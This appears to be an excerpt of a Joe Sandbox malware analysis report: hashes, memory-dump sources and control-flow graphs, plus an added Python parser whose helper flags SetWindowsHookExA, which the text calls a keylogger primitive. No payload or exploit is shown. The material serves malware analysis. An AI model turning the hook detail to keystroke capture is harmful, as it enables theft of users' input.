                                                          • Opcode Fuzzy Hash: 467d661e83c9937ae69f5fff32fcc69753cf55525774fa377c183c003787a4f3
                                                          • Instruction Fuzzy Hash: 0B215331E042059BCB09CFA5D450A9EB7B6BF99300F20855AE816B7390DBB0DC46CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 94a30a1026a1d33392fb731534d6399881d5b6c0a2c1466ce25c449be7457dd0
                                                          • Instruction ID: 1c80db1c5c0c1853d4959576a37b84927baff9cf7fdf2fb14972db56fa9ae512
                                                          • Opcode Fuzzy Hash: 94a30a1026a1d33392fb731534d6399881d5b6c0a2c1466ce25c449be7457dd0
                                                          • Instruction Fuzzy Hash: 12212A34B40205DFDB55EB74C554BAE77F2AB9A344F20046CD406EB261DB35DD05CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 49f60d32bb6363cb56c9fe338a08bc6ea7bd72d743a2037ddc2a879c879e2875
                                                          • Instruction ID: 018d53f63b9786c4a338b9abb34844c6e21b284ba239475d4ae57fda649ac9f8
                                                          • Opcode Fuzzy Hash: 49f60d32bb6363cb56c9fe338a08bc6ea7bd72d743a2037ddc2a879c879e2875
                                                          • Instruction Fuzzy Hash: 282127746502016FDB52FB28E844F6D3366EB93314F900D25D006D72BAFB74EC8A8B90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 21cad1217071f2d2c5854314f24b6c49971a1fde4f61fd971ef145f12bb3c30f
                                                          • Instruction ID: 5c73f458c3cec81f500203ea791c76c76f9f6c6decd78d008ce52f9957ae0b9f
                                                          • Opcode Fuzzy Hash: 21cad1217071f2d2c5854314f24b6c49971a1fde4f61fd971ef145f12bb3c30f
                                                          • Instruction Fuzzy Hash: 7B21C034A00218CFDB55EB68D968BAD77F2BB9C304B214468E406EB3A0DB35DD458BA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ff67ba2b0757ef80c769050a99f9f6e382f104518734f9eaeee331626c4fd738
                                                          • Instruction ID: c69469bf088d12495f5f27217e87939c431fe431017f7925c6ed4b049ad2bfa9
                                                          • Opcode Fuzzy Hash: ff67ba2b0757ef80c769050a99f9f6e382f104518734f9eaeee331626c4fd738
                                                          • Instruction Fuzzy Hash: AC11E730F04344DFEF2756749890BAD3B619BBA314F24892ED006DB281EB25CD868BD1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: de21bc0dd061ee6f9b4fa5e2346149c1305cc432feb53837d6b67b557ad0d0cc
                                                          • Instruction ID: 98edff8fb197c33d1845caaa24e18ec8f70636f9359172ed044845fefc95a372
                                                          • Opcode Fuzzy Hash: de21bc0dd061ee6f9b4fa5e2346149c1305cc432feb53837d6b67b557ad0d0cc
                                                          • Instruction Fuzzy Hash: FE118F30B00204CBEF569A79D840B6A3791AB6A314F20893DE006DB295EB31DC868BD1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e713fc5473540bb8e1749b0d53b96c291c639f7c6bf71a4fb8b16fb9c690421d
                                                          • Instruction ID: cf9c94d2dd7e34ee9a703f733c212a6f9e1c4c307cccea352f8bddc038c4d4d7
                                                          • Opcode Fuzzy Hash: e713fc5473540bb8e1749b0d53b96c291c639f7c6bf71a4fb8b16fb9c690421d
                                                          • Instruction Fuzzy Hash: 7C112571F002119FCF11ABB49848BAE7BF1EB98250F140669E906D3351EB34C946CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1aaa91a243ad80778788e23391cab6ca4fe84aebd7cd41ce5d52d86f2386cda9
                                                          • Instruction ID: 23e25fa35db7679d3a0b6a0cab50b8933dd4940d5aecc65016240838b85a4ea0
                                                          • Opcode Fuzzy Hash: 1aaa91a243ad80778788e23391cab6ca4fe84aebd7cd41ce5d52d86f2386cda9
                                                          • Instruction Fuzzy Hash: 84118E32B001294BCB68DA68D914AAE73FBEBC9351B11813ED406EB350EF35DC06CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 438ff7dc74421cf43c2b1c500ae7ea07705a831710e435d00aa94e6c91e317c0
                                                          • Instruction ID: 880ea3f42cc6d75267776da2a771cca874bd905dbf1cf31e5a6739f03d5e78ab
                                                          • Opcode Fuzzy Hash: 438ff7dc74421cf43c2b1c500ae7ea07705a831710e435d00aa94e6c91e317c0
                                                          • Instruction Fuzzy Hash: 8D21E2B5D002599FCB00CFAAD984BDEFFB4BB49310F10852AE918A7241D374A954CBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7b33534ad4a833c384809fffcef59a3f8bbfe5fafe712c5fa7b488156ed7fe6d
                                                          • Instruction ID: 0e12aa8b1f8f09f985a8f505cf76bc9778899fa3413bc02d6ec22e01390d25b0
                                                          • Opcode Fuzzy Hash: 7b33534ad4a833c384809fffcef59a3f8bbfe5fafe712c5fa7b488156ed7fe6d
                                                          • Instruction Fuzzy Hash: 9421C2B5D00219AFCB00CF9AD984BDEFFB5FB49350F50852AE918B7200D374A954CBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5696ba8cc473baf8b6895f97d2f8adabd249754f19ccac9793a47bd5df940f77
                                                          • Instruction ID: 7a282c0f6a689d5f7decd6dce8c428b56a31f3d395a4428b57565388459cb9d9
                                                          • Opcode Fuzzy Hash: 5696ba8cc473baf8b6895f97d2f8adabd249754f19ccac9793a47bd5df940f77
                                                          • Instruction Fuzzy Hash: 60019E32B111155FDB689AB89860BEF77EBDB99711F41413EC406D7290EB618C07C7A2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 838e8c508efdfca2312beed570474875adcac8657cc142a47f10f5993d6eb7d9
                                                          • Instruction ID: 4d38320eeca60358f7f1d053dfbcc5e8c98ad3693c11ca180968286d8a1cba51
                                                          • Opcode Fuzzy Hash: 838e8c508efdfca2312beed570474875adcac8657cc142a47f10f5993d6eb7d9
                                                          • Instruction Fuzzy Hash: CE016D31A00215DBCB26EFF89445AAE7BF6EF6A350B24047DD406E7302EB36D9418BD1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 831cbae5a6d8cddfac48f23ba96b5374f8fcde9406b7d9210b8576e9f23bd900
                                                          • Instruction ID: ef559005ee1c772eff9efff7c18145837da548204ae69e3872a77d4773c801c2
                                                          • Opcode Fuzzy Hash: 831cbae5a6d8cddfac48f23ba96b5374f8fcde9406b7d9210b8576e9f23bd900
                                                          • Instruction Fuzzy Hash: B0112D34D05349DECF34DA94D59ABECB772AF24319F14942ED021B6091DB348ECACB12
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b5be83869df01160b6a6d1a91558aee4064a3483970ef9028aa06dd64964ecdd
                                                          • Instruction ID: 8e1124d71fae73fd4aaede8afc299aef6a060da804f8544b4cef08ba84acc0e9
                                                          • Opcode Fuzzy Hash: b5be83869df01160b6a6d1a91558aee4064a3483970ef9028aa06dd64964ecdd
                                                          • Instruction Fuzzy Hash: C3F08170A1034DAFC745FFB4E442AAD77B1EF40300B904968C504A7258EB30BE0E9B94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Execution Graph

                                                          Execution Coverage:11.1%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:3
                                                          Total number of Limit Nodes:0
                                                          execution_graph 16763 4b9ff8 16764 4ba03c SetWindowsHookExA 16763->16764 16766 4ba082 16764->16766

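The execution_graph line above is the flattened form of the graph Joe Sandbox renders in its HTML report: numbered nodes with their code addresses, any API name attached to the node that calls it (here SetWindowsHookExA, the API used to install a global hook procedure and the classic user-mode keylogger primitive), and src->dst edges. The control_flow_graph lines further down in this section use the same token scheme with basic-block address ranges and "call X" / "* N" annotations. The following Python is an added example written for this edit, not part of the Joe Sandbox report or of its tooling; the token rules it applies are inferred from the lines on this page and are an assumption, as are the sample inputs (the execution_graph line copied from above and a shortened excerpt of a control_flow_graph line).

```python
"""Parser for the flattened execution_graph / control_flow_graph text that Joe Sandbox
emits in its HTML reports.  Token rules are inferred from this report (assumption):
  <id> <addr>            new node; addr is "hex" (execution graph) or "hex-hex" (CFG block)
  <ApiName>              API called from the current node (execution graph)
  call <hex> [* <n>]     callee of the current CFG block, n times (default 1)
  <src>-><dst>           directed edge between node ids
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

# APIs that install Windows hook procedures; a WH_KEYBOARD / WH_KEYBOARD_LL hook is
# the classic user-mode keylogger primitive.
HOOK_APIS: Set[str] = {"SetWindowsHookExA", "SetWindowsHookExW", "SetWindowsHookEx"}

_DECIMAL = re.compile(r"^\d+$")
_RANGE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+)$")


@dataclass
class GraphNode:
    node_id: int
    start: int                       # code address, or start of the basic block
    end: Optional[int] = None        # end of the basic block (CFG only)
    apis: List[str] = field(default_factory=list)
    calls: List[Tuple[int, int]] = field(default_factory=list)   # (callee, count)


@dataclass
class JoeGraph:
    kind: str                        # "execution_graph" or "control_flow_graph"
    nodes: Dict[int, GraphNode] = field(default_factory=dict)
    edges: List[Tuple[int, int]] = field(default_factory=list)


def parse_joe_graph(text: str) -> JoeGraph:
    """Parse one flattened graph.  Whitespace-splitting also copes with a graph that
    the HTML-to-text step wrapped over several lines."""
    tokens = text.split()
    if not tokens or tokens[0] not in ("execution_graph", "control_flow_graph"):
        raise ValueError("not a Joe Sandbox graph line")
    graph = JoeGraph(kind=tokens[0])
    cur: Optional[GraphNode] = None
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        if "->" in tok:                                   # edge: test before the range
            src, dst = tok.split("->", 1)                 # pattern, which also has '-'
            graph.edges.append((int(src), int(dst)))
            i += 1
        elif _DECIMAL.match(tok):                         # node id followed by its address
            if i + 1 >= len(tokens):
                raise ValueError(f"node {tok} has no address (truncated graph?)")
            addr = tokens[i + 1]
            m = _RANGE.match(addr)
            if m:
                cur = GraphNode(int(tok), int(m.group(1), 16), int(m.group(2), 16))
            else:
                cur = GraphNode(int(tok), int(addr, 16))
            graph.nodes[cur.node_id] = cur
            i += 2
        elif tok == "call":                               # "call 1c0174 * 2": called twice
            if cur is None:
                raise ValueError("call annotation before any node")
            callee, count = int(tokens[i + 1], 16), 1
            i += 2
            if i + 1 < len(tokens) and tokens[i] == "*":
                count = int(tokens[i + 1])
                i += 2
            cur.calls.append((callee, count))
        else:                                             # anything else is an API name
            if cur is None:
                raise ValueError(f"API {tok} before any node")
            cur.apis.append(tok)
            i += 1
    return graph


def callers_of(graph: JoeGraph, node_id: int) -> List[int]:
    """Node ids with an edge into node_id."""
    return [src for src, dst in graph.edges if dst == node_id]


def hook_installs(graph: JoeGraph) -> List[Tuple[int, str, str]]:
    """(node id, hex address, api) for every hook-installing API call in the graph."""
    return [(n.node_id, f"{n.start:x}", api)
            for n in graph.nodes.values() for api in n.apis if api in HOOK_APIS]


# Sample inputs: the execution_graph line from this report, and a shortened excerpt of
# one of its control_flow_graph lines (edges to nodes outside the excerpt are kept).
EXEC_GRAPH = ("execution_graph 16763 4b9ff8 16764 4ba03c SetWindowsHookExA "
              "16763->16764 16766 4ba082 16764->16766")
CFG_EXCERPT = ("control_flow_graph 0 1cf360-1cf381 1 1cf383-1cf386 0->1 "
               "18 1cf3d4-1cf3ef call 1c64dc 13->18 "
               "66 1cf822-1cf8f8 call 1c0174 * 2 65->66")

if __name__ == "__main__":
    g = parse_joe_graph(EXEC_GRAPH)
    for node_id, addr, api in hook_installs(g):
        print(f"node {node_id} @ {addr}: {api}, reached from {callers_of(g, node_id)}")
    c = parse_joe_graph(CFG_EXCERPT)
    print(f"{len(c.nodes)} blocks, {len(c.edges)} edges, calls: "
          f"{[(hex(k), n) for b in c.nodes.values() for k, n in b.calls]}")
```

Two caveats when using this on a saved report. The text carries no record of which nodes were executed (the Executed / Not Executed legend survives only as colour in the rendered graph), so the parser gives structure and API presence, not coverage. And a graph that the page cut off mid-node, as the last control_flow_graph in this section is, raises ValueError instead of returning a silently partial graph.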
                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 1cf360-1cf381 1 1cf383-1cf386 0->1 2 1cf38c-1cf3ab 1->2 3 1cfb27-1cfb2a 1->3 12 1cf3ad-1cf3b0 2->12 13 1cf3c4-1cf3ce 2->13 4 1cfb2c-1cfb4b 3->4 5 1cfb50-1cfb52 3->5 4->5 7 1cfb59-1cfb5c 5->7 8 1cfb54 5->8 7->1 10 1cfb62-1cfb6b 7->10 8->7 12->13 15 1cf3b2-1cf3c2 12->15 18 1cf3d4-1cf3ef call 1c64dc 13->18 15->18 21 1cf3fc-1cf6d9 18->21 22 1cf3f1-1cf3f7 18->22 43 1cf6df-1cf78e 21->43 44 1cfb19-1cfb26 21->44 22->10 53 1cf7b7 43->53 54 1cf790-1cf7b5 43->54 56 1cf7c0-1cf7c9 call 1c64e8 53->56 54->56 58 1cf7ce-1cf7d3 56->58 59 1cf7d9-1cf7fb call 1c64f4 58->59 60 1cfb00-1cfb0c 58->60 59->60 64 1cf801-1cf80b 59->64 60->43 61 1cfb12 60->61 61->44 64->60 65 1cf811-1cf81c 64->65 65->60 66 1cf822-1cf8f8 call 1c0174 * 2 65->66 80 1cf8fa-1cf8fc 66->80 81 1cf906-1cf936 call 1c0174 66->81 80->81 86 1cf938-1cf93a 81->86 87 1cf944-1cf950 81->87 86->87 88 1cf9b0-1cf9b4 87->88 89 1cf952-1cf956 87->89 90 1cf9ba-1cf9f6 call 1c0174 88->90 91 1cfaf1-1cfafa 88->91 89->88 92 1cf958-1cf982 call 1c0174 89->92 105 1cf9f8-1cf9fa 90->105 106 1cfa04-1cfa12 90->106 91->60 91->66 101 1cf984-1cf986 92->101 102 1cf990-1cf9ad call 1c6500 92->102 101->102 102->88 105->106 109 1cfa29-1cfa34 106->109 110 1cfa14-1cfa1f 106->110 114 1cfa4c-1cfa5d 109->114 115 1cfa36-1cfa3c 109->115 110->109 113 1cfa21 110->113 113->109 119 1cfa5f-1cfa65 114->119 120 1cfa75-1cfa81 114->120 116 1cfa3e 115->116 117 1cfa40-1cfa42 115->117 116->114 117->114 121 1cfa69-1cfa6b 119->121 122 1cfa67 119->122 124 1cfa99-1cfaea 120->124 125 1cfa83-1cfa89 120->125 121->120 122->120 124->91 126 1cfa8d-1cfa8f 125->126 127 1cfa8b 125->127 126->124 127->124
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.625732464.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_1c0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0.L$$p$$p$$p$$p$$p$$p$.L
                                                          • API String ID: 0-1711779697
                                                          • Opcode ID: 7f74d1e4e99fbec056144970acbf2a6f50297f4b7adba9504f56c13872834e42
                                                          • Instruction ID: f213eafa5b43cc555ea6ab043e4fd71109ea575f579d4053e83c57172016d02f
                                                          • Opcode Fuzzy Hash: 7f74d1e4e99fbec056144970acbf2a6f50297f4b7adba9504f56c13872834e42
                                                          • Instruction Fuzzy Hash: E2322C31A1075A8BCB14EB65D854AADF7B2BFD9300F60C6AED409A7254EF70DD85CB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.625732464.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_1c0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0,L$0,L$.L
                                                          • API String ID: 0-1188208038
                                                          • Opcode ID: 94b32f58b1eefa6ca8e3da12fa0511dfb8ca83230a0ea885024be7c9015c5b5a
                                                          • Instruction ID: 92fdf3a6ad7bb5876aa30bd033d0213c0b9013d19c80be4f0a49eb56f0a78397
                                                          • Opcode Fuzzy Hash: 94b32f58b1eefa6ca8e3da12fa0511dfb8ca83230a0ea885024be7c9015c5b5a
                                                          • Instruction Fuzzy Hash: E0A21334A002048FDB64DB68C588FADB7F2FB99314F5584A9D409AB362DB35ED86CF41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.625732464.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_1c0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8dc38836af53d24ef4dd18d26e2d6b07b8afb9ae0b71c86f37bdc342fe95f38b
                                                          • Instruction ID: 952dea24af49ccf54c0538a7b8ed1e717c49474b3c63c7c0b76eaee01f653a77
                                                          • Opcode Fuzzy Hash: 8dc38836af53d24ef4dd18d26e2d6b07b8afb9ae0b71c86f37bdc342fe95f38b
                                                          • Instruction Fuzzy Hash: AB530931C10B1A8ACB51EF68C884A99F7B1FF99300F15C79AE45977121EB70AAD5CF81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.625732464.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_1c0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1479fcab7dfc38284c17849e14b09af508fa87a95fda98740e0759707df40f44
                                                          • Instruction ID: 63b8eeb6cedcdd7a53485e4a20a6e43bb963ff5635ca8bb6f7fc25227f2c11f7
                                                          • Opcode Fuzzy Hash: 1479fcab7dfc38284c17849e14b09af508fa87a95fda98740e0759707df40f44
                                                          • Instruction Fuzzy Hash: CD332E31D1071A8ACB15DF68C894AADF7B1FF99300F15C79AE449A7211EB70EAC5CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 3281 1c4518-1c457e 3283 1c45c8-1c45ca 3281->3283 3284 1c4580-1c458b 3281->3284 3285 1c45cc-1c45e5 3283->3285 3284->3283 3286 1c458d-1c4599 3284->3286 3292 1c45e7-1c45f3 3285->3292 3293 1c4631-1c4633 3285->3293 3287 1c45bc-1c45c6 3286->3287 3288 1c459b-1c45a5 3286->3288 3287->3285 3290 1c45a9-1c45b8 3288->3290 3291 1c45a7 3288->3291 3290->3290 3294 1c45ba 3290->3294 3291->3290 3292->3293 3295 1c45f5-1c4601 3292->3295 3296 1c4635-1c464d 3293->3296 3294->3287 3297 1c4624-1c462f 3295->3297 3298 1c4603-1c460d 3295->3298 3303 1c464f-1c465a 3296->3303 3304 1c4697-1c4699 3296->3304 3297->3296 3299 1c460f 3298->3299 3300 1c4611-1c4620 3298->3300 3299->3300 3300->3300 3302 1c4622 3300->3302 3302->3297 3303->3304 3305 1c465c-1c4668 3303->3305 3306 1c469b-1c46b3 3304->3306 3307 1c466a-1c4674 3305->3307 3308 1c468b-1c4695 3305->3308 3313 1c46fd-1c46ff 3306->3313 3314 1c46b5-1c46c0 3306->3314 3309 1c4678-1c4687 3307->3309 3310 1c4676 3307->3310 3308->3306 3309->3309 3312 1c4689 3309->3312 3310->3309 3312->3308 3315 1c4701-1c4774 3313->3315 3314->3313 3316 1c46c2-1c46ce 3314->3316 3325 1c477a-1c4788 3315->3325 3317 1c46d0-1c46da 3316->3317 3318 1c46f1-1c46fb 3316->3318 3320 1c46dc 3317->3320 3321 1c46de-1c46ed 3317->3321 3318->3315 3320->3321 3321->3321 3322 1c46ef 3321->3322 3322->3318 3326 1c478a-1c4790 3325->3326 3327 1c4791-1c47f1 3325->3327 3326->3327 3334 1c4801-1c4805 3327->3334 3335 1c47f3-1c47f7 3327->3335 3337 1c4815-1c4819 3334->3337 3338 1c4807-1c480b 3334->3338 3335->3334 3336 1c47f9 3335->3336 3336->3334 3339 1c4829-1c482d 3337->3339 3340 1c481b-1c481f 3337->3340 3338->3337 3341 1c480d 3338->3341 3343 1c483d-1c4841 3339->3343 3344 1c482f-1c4833 3339->3344 3340->3339 3342 1c4821 3340->3342 3341->3337 3342->3339 3346 1c4851-1c4855 3343->3346 3347 1c4843-1c4847 3343->3347 3344->3343 3345 1c4835 3344->3345 3345->3343 3349 1c4865 3346->3349 3350 1c4857-1c485b 3346->3350 3347->3346 3348 1c4849-1c484c call 1c0ab8 3347->3348 3348->3346 3353 1c4866 3349->3353 3350->3349 3352 1c485d-1c4860 call 1c0ab8 3350->3352 3352->3349 3353->3353
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.625732464.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_1c0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: af975b69bb32246445b60b9a66f9f473b7b4f4ddd90851bf7123b1b1a58fb21b
                                                          • Instruction ID: f2bca7acb9a53fdb0090347e58f3a5987d9ce1c2198e57af181985f1ad43da19
                                                          • Opcode Fuzzy Hash: af975b69bb32246445b60b9a66f9f473b7b4f4ddd90851bf7123b1b1a58fb21b
                                                          • Instruction Fuzzy Hash: 36B17A70E04259CFDF10CFA8C8A5BADBBF2AF99314F14852DD815AB294EB74D845CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 3355 1c3900-1c3966 3357 1c3968-1c3973 3355->3357 3358 1c39b0-1c39b2 3355->3358 3357->3358 3359 1c3975-1c3981 3357->3359 3360 1c39b4-1c3a0c 3358->3360 3361 1c39a4-1c39ae 3359->3361 3362 1c3983-1c398d 3359->3362 3369 1c3a0e-1c3a19 3360->3369 3370 1c3a56-1c3a58 3360->3370 3361->3360 3363 1c398f 3362->3363 3364 1c3991-1c39a0 3362->3364 3363->3364 3364->3364 3366 1c39a2 3364->3366 3366->3361 3369->3370 3372 1c3a1b-1c3a27 3369->3372 3371 1c3a5a-1c3a72 3370->3371 3379 1c3abc-1c3abe 3371->3379 3380 1c3a74-1c3a7f 3371->3380 3373 1c3a29-1c3a33 3372->3373 3374 1c3a4a-1c3a54 3372->3374 3375 1c3a35 3373->3375 3376 1c3a37-1c3a46 3373->3376 3374->3371 3375->3376 3376->3376 3378 1c3a48 3376->3378 3378->3374 3381 1c3ac0-1c3b0e 3379->3381 3380->3379 3382 1c3a81-1c3a8d 3380->3382 3390 1c3b14-1c3b22 3381->3390 3383 1c3a8f-1c3a99 3382->3383 3384 1c3ab0-1c3aba 3382->3384 3386 1c3a9d-1c3aac 3383->3386 3387 1c3a9b 3383->3387 3384->3381 3386->3386 3388 1c3aae 3386->3388 3387->3386 3388->3384 3391 1c3b2b-1c3b8b 3390->3391 3392 1c3b24-1c3b2a 3390->3392 3399 1c3b8d-1c3b91 3391->3399 3400 1c3b9b-1c3b9f 3391->3400 3392->3391 3399->3400 3401 1c3b93 3399->3401 3402 1c3baf-1c3bb3 3400->3402 3403 1c3ba1-1c3ba5 3400->3403 3401->3400 3405 1c3bb5-1c3bb9 3402->3405 3406 1c3bc3-1c3bc7 3402->3406 3403->3402 3404 1c3ba7-1c3baa call 1c0ab8 3403->3404 3404->3402 3405->3406 3410 1c3bbb-1c3bbe call 1c0ab8 3405->3410 3407 1c3bc9-1c3bcd 3406->3407 3408 1c3bd7-1c3bdb 3406->3408 3407->3408 3411 1c3bcf-1c3bd2 call 1c0ab8 3407->3411 3412 1c3bdd-1c3be1 3408->3412 3413 1c3beb-1c3bef 3408->3413 3410->3406 3411->3408 3412->3413 3416 1c3be3 3412->3416 3417 1c3bff 3413->3417 3418 1c3bf1-1c3bf5 3413->3418 3416->3413 3420 1c3c00 3417->3420 3418->3417 3419 1c3bf7 3418->3419 3419->3417 3420->3420
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.625732464.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_1c0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5083923d39086bbf0388808567be1a5fa2c3a3a4ffe9aa2933d754fd9a1ee955
                                                          • Instruction ID: 2c640c78d9bf8fa237530adcc94b25364a8a12a1f2547b6688abe5a12c65770c
